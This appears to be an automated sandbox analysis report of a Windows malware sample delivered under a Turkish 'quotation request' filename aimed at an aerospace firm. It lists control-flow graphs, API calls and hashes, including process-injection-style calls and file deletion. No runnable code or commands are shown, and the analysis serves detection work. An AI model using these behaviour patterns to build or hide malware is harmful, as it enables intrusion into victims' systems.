                                                                                                                                    control_flow_graph 1320 1f2947-1f29b9 call 1c1f50 call 1f25d6 call 19fe0b call 185722 call 1f274e call 18511f call 1a5232 1335 1f29bf-1f29c6 call 1f2e66 1320->1335 1336 1f2a6c-1f2a73 call 1f2e66 1320->1336 1341 1f29cc-1f2a6a call 1ad583 call 1a4983 call 1a9038 call 1ad583 call 1a9038 * 2 1335->1341 1342 1f2a75-1f2a77 1335->1342 1336->1342 1343 1f2a7c 1336->1343 1346 1f2a7f-1f2b3a call 1850f5 * 8 call 1f3017 call 1ae5eb 1341->1346 1345 1f2cb6-1f2cb7 1342->1345 1343->1346 1347 1f2cd5-1f2cdb 1345->1347 1385 1f2b3c-1f2b3e 1346->1385 1386 1f2b43-1f2b5e call 1f2792 1346->1386 1350 1f2cdd-1f2ce8 call 19fdcd call 19fe14 1347->1350 1351 1f2cf0-1f2cf6 1347->1351 1363 1f2ced 1350->1363 1363->1351 1385->1345 1389 1f2b64-1f2b6c 1386->1389 1390 1f2bf0-1f2bfc call 1ae678 1386->1390 1391 1f2b6e-1f2b72 1389->1391 1392 1f2b74 1389->1392 1397 1f2bfe-1f2c0d DeleteFileW 1390->1397 1398 1f2c12-1f2c16 1390->1398 1394 1f2b79-1f2b97 call 1850f5 1391->1394 1392->1394 1402 1f2b99-1f2b9e 1394->1402 1403 1f2bc1-1f2bd7 call 1f211d call 1adbb3 1394->1403 1397->1345 1400 1f2c18-1f2c7e call 1f25d6 call 1ad2eb * 2 call 1f22ce 1398->1400 1401 1f2c91-1f2ca5 CopyFileW 1398->1401 1405 1f2cb9-1f2ccf DeleteFileW call 1f2fd8 1400->1405 1425 1f2c80-1f2c8f DeleteFileW 1400->1425 1401->1405 1406 1f2ca7-1f2cb4 DeleteFileW 1401->1406 1408 1f2ba1-1f2bb4 call 1f28d2 1402->1408 1420 1f2bdc-1f2be7 1403->1420 1411 1f2cd4 1405->1411 1406->1345 1418 1f2bb6-1f2bbf 1408->1418 1411->1347 1418->1403 1420->1389 1422 1f2bed 1420->1422 1422->1390 1425->1345
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2C05
                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 001F2C87
                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F2C9D
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2CAE
                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001F2CC0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                    • Opcode ID: 9a506eef0bf7ad9471a0eef1d47744a9ec5e13a4a70ba625bb6fdb98f88464f2
                                                                                                                                    • Instruction ID: 5e45aa85175e8c743961c0215c2fe96d3f2d2be8d3a0610ef4d5e90c9af25838
                                                                                                                                    • Opcode Fuzzy Hash: 9a506eef0bf7ad9471a0eef1d47744a9ec5e13a4a70ba625bb6fdb98f88464f2
                                                                                                                                    • Instruction Fuzzy Hash: 28B11C71D0011DABDF25EBA4CC85EEEBBBDEF59350F1040A6FA09E6151EB309A448F61

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1462 183b1c-183b27 1463 183b99-183b9b 1462->1463 1464 183b29-183b2e 1462->1464 1465 183b8c-183b8f 1463->1465 1464->1463 1466 183b30-183b48 RegOpenKeyExW 1464->1466 1466->1463 1467 183b4a-183b69 RegQueryValueExW 1466->1467 1468 183b6b-183b76 1467->1468 1469 183b80-183b8b RegCloseKey 1467->1469 1470 183b78-183b7a 1468->1470 1471 183b90-183b97 1468->1471 1469->1465 1472 183b7e 1470->1472 1471->1472 1472->1469
                                                                                                                                    APIs
                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B40
                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B61
                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00183B0F,SwapMouseButtons,00000004,?), ref: 00183B83
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                    • Opcode ID: 692a6d112406b7f5f37abffb1b2967b50bb5a90e882164af1bc0b1b6e704b856
                                                                                                                                    • Instruction ID: c26bd1436088277328bfaafd95c657990ef857af99b7334ff58f3c336e8cb523
                                                                                                                                    • Opcode Fuzzy Hash: 692a6d112406b7f5f37abffb1b2967b50bb5a90e882164af1bc0b1b6e704b856
                                                                                                                                    • Instruction Fuzzy Hash: 76112AB5510208FFDB21DFA5DC48AEEB7B8EF04B84B148459A815D7210E7319F409B60
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018A02A5
                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018A02C9
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018A02EB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1456313180.000000000189E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0189E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_189e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                    • Opcode ID: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                                                                    • Instruction ID: 653772fb99a07464df47ceb48620f5f46ef3c4ec934042c2fe2ddf5df1b2a3a2
                                                                                                                                    • Opcode Fuzzy Hash: dbcdd5886b880b5c161ff2c694cfceffc24b8721b5d78ef826e157d7e74dbfef
                                                                                                                                    • Instruction Fuzzy Hash: 75620A30A142589BEB24CFA4C850BDEB772FF58304F5091A9E20DEB394E7759E81CB59
                                                                                                                                    APIs
                                                                                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 001C2C8C
                                                                                                                                      • Part of subcall function 00183AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00183A97,?,?,00182E7F,?,?,?,00000000), ref: 00183AC2
                                                                                                                                      • Part of subcall function 00182DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00182DC4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                    • String ID: X$`e$
                                                                                                                                    • API String ID: 779396738-2370829165
                                                                                                                                    • Opcode ID: 2f4fca66ca1d1cb471623c330520e40881f8dc2f0ab5e9f5658a69a0517197aa
                                                                                                                                    • Instruction ID: b416d81d999e363d0eba836587a778befe9fc94c6fca6655fb539c3304481194
                                                                                                                                    • Opcode Fuzzy Hash: 2f4fca66ca1d1cb471623c330520e40881f8dc2f0ab5e9f5658a69a0517197aa
                                                                                                                                    • Instruction Fuzzy Hash: 0C21E770A102589FCF05EF94D809BEE7BFCAF59714F008059E405F7241DBB49A498F61
                                                                                                                                    APIs
                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 001A0668
                                                                                                                                      • Part of subcall function 001A32A4: RaiseException.KERNEL32(?,?,?,001A068A,?,00251444,?,?,?,?,?,?,001A068A,00181129,00248738,00181129), ref: 001A3304
                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 001A0685
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                    • String ID: Unknown exception
                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                    • Opcode ID: e3e210f7e96a4c9535ef97233fcdd6199ff6d5187c1acb6aa90fc139e5edaa61
                                                                                                                                    • Instruction ID: f645ab7fb62081b450601af9c92d59d089620845a841928daf363891a614d561
                                                                                                                                    • Opcode Fuzzy Hash: e3e210f7e96a4c9535ef97233fcdd6199ff6d5187c1acb6aa90fc139e5edaa61
                                                                                                                                    • Instruction Fuzzy Hash: DFF0C23C90020D77CF05BAA4D846DAE7BAC5E56354B604135B828D6591EF71EA66C5C0
                                                                                                                                    APIs
                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001F302F
                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 001F3044
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Temp$FileNamePath
                                                                                                                                    • String ID: aut
                                                                                                                                    • API String ID: 3285503233-3010740371
                                                                                                                                    • Opcode ID: 792370455209c0a8a7126c13ae87da06919120097a649cd0b2312782618fc97b
                                                                                                                                    • Instruction ID: cb9444f3c8ec030962250fec8ce7f11ca8a948da5447588fe088bb4d067c6162
                                                                                                                                    • Opcode Fuzzy Hash: 792370455209c0a8a7126c13ae87da06919120097a649cd0b2312782618fc97b
                                                                                                                                    • Instruction Fuzzy Hash: F9D05EB654032867DA20A7A4AC0EFCB3A6CDB05750F0002A1BA55E2091DEF09984CAD0
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002082F5
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 002082FC
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 002084DD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                    • Opcode ID: 3c35440be6256abe78314e3bf96becc449b5af8a368c4beba56a2438b1000c38
                                                                                                                                    • Instruction ID: e50a5dfd4d0f83c4c7d16588bd01f3f683e7b20e2340acb491668746bcb98525
                                                                                                                                    • Opcode Fuzzy Hash: 3c35440be6256abe78314e3bf96becc449b5af8a368c4beba56a2438b1000c38
                                                                                                                                    • Instruction Fuzzy Hash: CF127A71A183419FD714DF28C484B2ABBE1BF88318F14895DE9898B392CB71ED45CF92
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 12bea9b11eb7487647b2c513f390eaaf2bf09a6b4c376845a59c0a3f132772e4
                                                                                                                                    • Instruction ID: 110e1cd0dae2fb01f25f05f4c33ae579b3ef4380ddf919088222468905b8ee2f
                                                                                                                                    • Opcode Fuzzy Hash: 12bea9b11eb7487647b2c513f390eaaf2bf09a6b4c376845a59c0a3f132772e4
                                                                                                                                    • Instruction Fuzzy Hash: 2A51B275D006099FCB25AFA4C949FEE7FBBAF19310F14005AF405A7292DB719A02CB61
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00181BF4
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00181BFC
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00181C07
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00181C12
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00181C1A
                                                                                                                                      • Part of subcall function 00181BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00181C22
                                                                                                                                      • Part of subcall function 00181B4A: RegisterWindowMessageW.USER32(00000004,?,001812C4), ref: 00181BA2
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0018136A
                                                                                                                                    • OleInitialize.OLE32 ref: 00181388
                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 001C24AB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                    • Opcode ID: e20a9c296256c621c7c67666ce675f628ce27761423e805313ff181921320318
                                                                                                                                    • Instruction ID: 1596beb70a1c319bb73b1813b160f54b632cd199743b8e7a7b5a2071385cc2a8
                                                                                                                                    • Opcode Fuzzy Hash: e20a9c296256c621c7c67666ce675f628ce27761423e805313ff181921320318
                                                                                                                                    • Instruction Fuzzy Hash: 7971B9B89213008FD794EF79B84D7A53AE4FBA8356794862AD40AC7361FB304965CF4C
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00183923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00183A04
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001EC259
                                                                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 001EC261
                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001EC270
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3500052701-0
                                                                                                                                    • Opcode ID: 34fec0db483084be8106bd48e5fd04794c38866c97a22182ebf560fc1f5807d4
                                                                                                                                    • Instruction ID: a0e7b07300eaaae1ff68aead20e97504ad4ccb4e22c519cd31c14b4632427a30
                                                                                                                                    • Opcode Fuzzy Hash: 34fec0db483084be8106bd48e5fd04794c38866c97a22182ebf560fc1f5807d4
                                                                                                                                    • Instruction Fuzzy Hash: 3B31F770904784AFEB329F749C59BEBBBEC9F16304F00009DE2DA93241C7745A85CB91
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNELBASE(00000000,00000000,?,?,001B85CC,?,00248CC8,0000000C), ref: 001B8704
                                                                                                                                    • GetLastError.KERNEL32(?,001B85CC,?,00248CC8,0000000C), ref: 001B870E
                                                                                                                                    • __dosmaperr.LIBCMT ref: 001B8739
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2583163307-0
                                                                                                                                    • Opcode ID: 3423356174fa86024f11608245a7980fc6900eac47478c56f42214b8921e1302
                                                                                                                                    • Instruction ID: 1bf734e5a8ed33a722751a23c9ea366c996cef7972d811155b6115a47abeb209
                                                                                                                                    • Opcode Fuzzy Hash: 3423356174fa86024f11608245a7980fc6900eac47478c56f42214b8921e1302
                                                                                                                                    • Instruction Fuzzy Hash: C6014E32A0572026D7647334B8497FE678E5BA2F78F390159F8188B2E2DFB0CC81C190
                                                                                                                                    APIs
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0018DB7B
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0018DB89
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB9F
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0018DBB1
                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 001D1CC9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3288985973-0
                                                                                                                                    • Opcode ID: dbdf228e04b504186638671ecf512008ef30585d5dd9597b73679d21355da00b
                                                                                                                                    • Instruction ID: 3f6c8a45e77d6b90b79bd0782d5363a334008bce66fc5bb7e96bd826f14b72ac
                                                                                                                                    • Opcode Fuzzy Hash: dbdf228e04b504186638671ecf512008ef30585d5dd9597b73679d21355da00b
                                                                                                                                    • Instruction Fuzzy Hash: ACF05E30654340ABEB30DBA0EC8DFEA73ADEB55311F104919E60A830C0DB709548CF15
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,001F2CD4,?,?,?,00000004,00000001), ref: 001F2FF2
                                                                                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F3006
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,001F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001F300D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3397143404-0
                                                                                                                                    • Opcode ID: 67eb7a5143a9fbe4068e181819c16c7dfe2c9a967a3c194148acb6b80ef1918b
                                                                                                                                    • Instruction ID: a563204bb31112370b6ad6d243745e7ffae2bf2e0f7cbb61d4d6af69a093bfbd
                                                                                                                                    • Opcode Fuzzy Hash: 67eb7a5143a9fbe4068e181819c16c7dfe2c9a967a3c194148acb6b80ef1918b
                                                                                                                                    • Instruction Fuzzy Hash: 8CE086362C022477D2302755BC0DFDB3A1CD786B71F208210F729750D08AA1160142A8
                                                                                                                                    APIs
                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 001917F6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
